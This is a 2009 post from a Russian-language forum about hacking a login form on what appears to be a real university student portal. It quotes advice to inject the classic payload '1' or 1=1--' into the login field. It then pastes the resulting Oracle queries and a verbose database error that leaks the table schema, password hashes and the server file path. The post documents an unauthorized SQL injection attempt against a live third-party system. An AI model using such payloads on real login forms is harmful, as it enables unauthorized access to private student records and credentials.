09.08.2009, 19:17
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391
Репутация:
0
|
|
Сообщение от fraIzer
Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?
Запрос у нас будет выглядеть примерно следующим образом:
Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
ввел в логин
получил
К сожалению, в настоящий момент продолжение работы невозможно. Примите извинения за доставленные неудобства.
ошибка при попытке авторизации студента
ошибка БД: SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936' and t.SPASSWORD='9862C0CBF9702F2883680ACFFE8768DD' and t.idstudent is not NULL [nativecode=ORA-01756: quoted string not properly terminated]
файл: /www/web/sites/student_study/index.php:55
|
|
|